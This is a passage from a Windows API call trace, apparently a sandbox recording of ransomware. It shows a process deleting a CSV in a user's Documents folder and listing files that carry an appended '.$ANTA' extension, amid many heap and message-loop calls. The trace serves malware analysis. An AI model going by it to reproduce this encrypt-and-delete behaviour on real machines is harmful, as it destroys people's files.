nFileSizeLow=0x12013, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="sAJ5q4Jpz7.csv", cAlternateFileName="SAJ5Q4~1.CSV")) returned 0x41ac500 [0079.772] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\sAJ5q4Jpz7.csv" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\saj5q4jpz7.csv")) returned 1 [0079.784] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36c3c2c0, ftCreationTime.dwHighDateTime=0x1d5e967, ftLastAccessTime.dwLowDateTime=0xefd1a510, ftLastAccessTime.dwHighDateTime=0x1d5efe9, ftLastWriteTime.dwLowDateTime=0xefd1a510, ftLastWriteTime.dwHighDateTime=0x1d5efe9, nFileSizeHigh=0x0, nFileSizeLow=0x12013, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="sAJ5q4Jpz7.csv", cAlternateFileName="SAJ5Q4~1.CSV")) returned 0 [0079.784] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0079.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0079.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0079.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0079.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0079.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359a68 | out: hHeap=0x1780000) returned 1 [0079.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0079.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0079.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0079.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0079.784] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0079.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0079.784] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0079.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0079.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0079.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0079.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0079.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0079.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5b8 | out: hHeap=0x1780000) returned 1 [0079.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0079.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0079.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf590 | out: hHeap=0x1780000) returned 1 [0079.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b218f0 | out: hHeap=0x1780000) returned 1 [0079.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0079.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0079.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0079.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0079.785] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0079.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0079.785] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0079.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0079.822] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0079.822] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0079.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c40 | out: hHeap=0x1780000) returned 1 [0079.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0079.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0079.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0079.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0079.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0079.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0079.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0079.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0079.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0079.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0079.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0079.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0079.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0079.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0079.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0079.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0079.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0079.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0079.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0079.823] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0079.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0079.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0079.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0079.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0079.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0079.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a500 | out: hHeap=0x1780000) returned 1 [0079.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0079.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0079.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0079.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0079.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a030 | out: hHeap=0x1780000) returned 1 [0079.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0079.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0079.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0079.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0079.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0079.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0079.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0079.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0079.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x428b4e8 | out: hHeap=0x1780000) returned 1 [0079.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0079.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0079.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0079.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0079.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0079.824] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0079.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0079.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0079.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0079.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0079.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0079.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0079.824] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0079.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0079.824] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0079.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0079.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0079.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0079.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0079.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0079.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0079.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0079.824] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0079.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0079.825] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg")) returned 0x10 [0079.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0079.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0079.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0079.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0079.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0079.825] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0079.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0079.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0079.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0079.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0079.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0079.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0079.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0079.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0079.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0079.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0079.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0079.825] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0079.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0079.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0079.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0079.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0079.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0079.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0079.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0079.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0079.826] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0079.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0079.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0079.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0079.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0079.826] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\*", lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8bbbd340, ftCreationTime.dwHighDateTime=0x1d5e57e, ftLastAccessTime.dwLowDateTime=0xfbb1225b, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfbb1225b, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca898, cFileName=".", cAlternateFileName="")) returned 0x41ac440 [0079.826] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8bbbd340, ftCreationTime.dwHighDateTime=0x1d5e57e, ftLastAccessTime.dwLowDateTime=0xfbb1225b, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfbb1225b, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca898, cFileName="..", cAlternateFileName="")) returned 1 [0079.826] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfafe238d, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xfafe238d, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfb054a83, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x23c0, dwReserved0=0x0, dwReserved1=0x43ca898, cFileName="1ft lPPb9LICRxn6.doc.$ANTA", cAlternateFileName="1FTLPP~1.$AN")) returned 1 [0079.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0079.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a2f0 | out: hHeap=0x1780000) returned 1 [0079.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0079.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0079.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0079.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0079.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0079.826] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0079.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eada8 | out: hHeap=0x1780000) returned 1 [0079.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0079.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0079.826] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0079.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0079.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0079.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0079.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0079.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0079.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0079.827] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0079.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0079.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0079.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0079.827] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0079.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0079.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0079.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0079.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0079.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0079.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0079.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0079.827] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0079.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0079.827] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0079.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0079.827] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb13977d, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xfb13977d, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfb1abf71, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x2270, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="6O-EvMa xQmykruQi.xlsx.$ANTA", cAlternateFileName="6O-EVM~1.$AN")) returned 1 [0079.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0079.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0079.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0079.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0079.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0079.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0079.827] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0079.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0079.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0079.828] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0079.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0079.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0079.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0079.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0079.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0079.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 